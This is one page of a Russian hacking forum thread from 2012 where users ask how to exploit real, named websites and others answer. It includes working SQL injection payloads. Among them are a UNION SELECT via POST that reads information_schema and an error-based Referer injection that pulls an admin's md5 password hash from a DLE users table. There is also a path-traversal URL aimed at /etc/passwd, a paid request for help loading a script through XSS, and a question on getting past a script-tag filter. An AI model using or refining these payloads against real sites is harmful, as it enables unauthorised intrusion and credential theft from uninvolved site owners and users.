Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
Page 1084 of 1207
  1. Vip77

    Vip77 Elder - Старейшина

    Joined:
    29 Sep 2012
    Messages:
    281
    Likes Received:
    55
    Reputations:
    20
    http://www.ctege.info/index.php?option=1 как раскрутить?
     
    #21661 Vip77, 24 Dec 2012
  2. herfleisch

    herfleisch Elder - Старейшина

    Joined:
    7 Jan 2009
    Messages:
    579
    Likes Received:
    203
    Reputations:
    13
    Как минимум есть раскрытие путей. Несколько раз повводил отбалдовые запросы и получил вот это:
    http://www.ctege.info/index.php?option=../../../../.../.../etc/passwd

     
    #21662 herfleisch, 24 Dec 2012
  3. foxxx1234

    foxxx1234 Member

    Joined:
    26 Nov 2008
    Messages:
    0
    Likes Received:
    7
    Reputations:
    0
    Зачем мне это гуглить, xss есть, мне просто нужно чтобы скрипт свой можно было подгрузить. В общем кто знает как это сделать стукните в личку даю 500р
     
    #21663 foxxx1234, 24 Dec 2012
  4. Vip77

    Vip77 Elder - Старейшина

    Joined:
    29 Sep 2012
    Messages:
    281
    Likes Received:
    55
    Reputations:
    20
    sqli там тоже есть
     
    #21664 Vip77, 25 Dec 2012
  5. qwwertty

    qwwertty New Member

    Joined:
    26 Dec 2009
    Messages:
    37
    Likes Received:
    1
    Reputations:
    1
    Как раскрутить это?
    Code:
    _ttp://www.howtotrade.ru/phorum/topusers.php?11,num=50%27
     
    #21665 qwwertty, 25 Dec 2012
  6. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Code:
    select user_id, username, posts from phorum_users where posts > 0 order by posts DESC LIMIT 0,[COLOR=Red][INJECT][/COLOR]
    Инъекция в LIMIT при использовании конструкции ORDER BY.

    Вывод - никак не раскрутишь.
     
    _________________________
    #21666 BigBear, 25 Dec 2012
    3 people like this.
  7. FunOfGun

    FunOfGun Elder - Старейшина

    Joined:
    5 Sep 2012
    Messages:
    388
    Likes Received:
    72
    Reputations:
    124
    Как в таком запросе: http://www.miamacdonald.com/a.php?id=-42%20union%20select%201,version(),3,4,5,6%20-- вместо version() вывести произвольную строку? Заранее благодарен.
     
    #21667 FunOfGun, 25 Dec 2012
  8. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    шифруешь строку в хекс и вставляешь
     
    #21668 qaz, 25 Dec 2012
    1 person likes this.
  9. herfleisch

    herfleisch Elder - Старейшина

    Joined:
    7 Jan 2009
    Messages:
    579
    Likes Received:
    203
    Reputations:
    13
    SQLi там есть, но раскрутить ее у меня не получилось, ибо строка запроса тупо попадает в условие запроса. Кто-то более опытный, может быть, сможет что-то выжать.
     
    #21669 herfleisch, 25 Dec 2012
    1 person likes this.
  10. Vip77

    Vip77 Elder - Старейшина

    Joined:
    29 Sep 2012
    Messages:
    281
    Likes Received:
    55
    Reputations:
    20
    Люди, помогите плиз найти раскрытие путей сайта http://www.sport.ru/
     
    #21670 Vip77, 26 Dec 2012
  11. Melfis

    Melfis Elder - Старейшина

    Joined:
    25 Apr 2011
    Messages:
    505
    Likes Received:
    105
    Reputations:
    53
    Первый пост темы
    Ключевое слово тут - детальной.
     
    #21671 Melfis, 26 Dec 2012
    Last edited: 26 Dec 2012
    1 person likes this.
  12. zenon3

    zenon3 New Member

    Joined:
    22 Aug 2011
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Помогите раскрутить
    http://tonnel.ru/?l=recept&recept=obich&idi=193'

    И еще такой вопрос. Как обойти фильтрацию FROM ? стандарто не получается
     
    #21672 zenon3, 28 Dec 2012
    Last edited: 28 Dec 2012
  13. Melfis

    Melfis Elder - Старейшина

    Joined:
    25 Apr 2011
    Messages:
    505
    Likes Received:
    105
    Reputations:
    53
    по первому вопросу:
    запрос фильтруется по union, когда передаёшь гетом(возможно ещё что-то, но пофиг). Скрипт принимает пост так же как и гет, только не фильтрует данные (или же хост сам фильтрует только гет на юнионы и пр.).
    Шлёшь на http://tonnel.ru/
    l=recept&recept=obich&idi=-193' union select 1,(select table_name from information_schema.tables limit 1),3,4,5,6,7,8,9--
    2. смотря как фильтруется, может и саму фильтрацию просто можно обойти.
     
    #21673 Melfis, 28 Dec 2012
    2 people like this.
  14. Vip77

    Vip77 Elder - Старейшина

    Joined:
    29 Sep 2012
    Messages:
    281
    Likes Received:
    55
    Reputations:
    20
    Всем привет, есть короче сайт со sqli в referer, но когда вывожу пароль админа, то не хватает одного символа в хэше md5 вот так запрашиваю:
    Referer: 1' and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,Hex(cast(dle_users.password as char)),0x27,0x7e) FROM `slidem`.dle_users LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1

    И вот че пишут: 63303161616237343161363064663039313866363861346434303137623331
    Если расшифровать то будет c01aab741a60df0918f68a4d4017b31 31 символ - 1 не хватает.

    Как вывести весь пароль? :confused:
     
    #21674 Vip77, 29 Dec 2012
  15. VY_CMa

    VY_CMa Green member

    Joined:
    6 Jan 2012
    Messages:
    917
    Likes Received:
    492
    Reputations:
    724
    Vip77, можно использовать функцию RIGHT().
     
    _________________________
    #21675 VY_CMa, 29 Dec 2012
  16. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    PHP:
    1' and(select 1 from(select count(*),mid((select unhex(hex(cast(password as char))) from `slidem`.dle_users limit 0,1),rand(0)|0,64)x from information_schema.tables group by x)a) and '1'='1
     
    #21676 cat1vo, 29 Dec 2012
    2 people like this.
  17. singa

    singa New Member

    Joined:
    14 Oct 2012
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Помогите раскрутить.
    http://www.guljan.info/news/2012/October/2707?page=%27+OR+1=1/*
    По-моему, параметр page в коде просто приводится к целому числу и вставляется
    ...desc limit {$page}-12, 12....
    Но я могу ошибаться.
     
    #21677 singa, 29 Dec 2012
  18. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    _ttp://www.guljan.info/news/2012/October/2707?page=-2

    Вектор атаки невозможен по причине выделенной выше
     
    _________________________
    #21678 BigBear, 29 Dec 2012
  19. GhostW

    GhostW Member

    Joined:
    17 Oct 2012
    Messages:
    207
    Likes Received:
    46
    Reputations:
    33
    Помогите раскрутить:
    Code:
    _ttp://w ww.knightarmco.com/shop/ index.php?keyword=5&main_page=advanced_search_result&search_in_description=1
    параметр keyword уязвим... чёт у меня ничего не получается...
     
    #21679 GhostW, 30 Dec 2012
  20. _Spamer_

    _Spamer_ Elder - Старейшина

    Joined:
    3 Feb 2009
    Messages:
    83
    Likes Received:
    140
    Reputations:
    16
    Ребят есть активная XSS. Имеется фильтр на слово script.
    Нужно подгрузить свой js файл. Нужна альтернатива <script src=>
     
    #21680 _Spamer_, 31 Dec 2012
    1 person likes this.
(You must log in or sign up to post here.)
Page 1084 of 1207
Thread Status:
Not open for further replies.
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.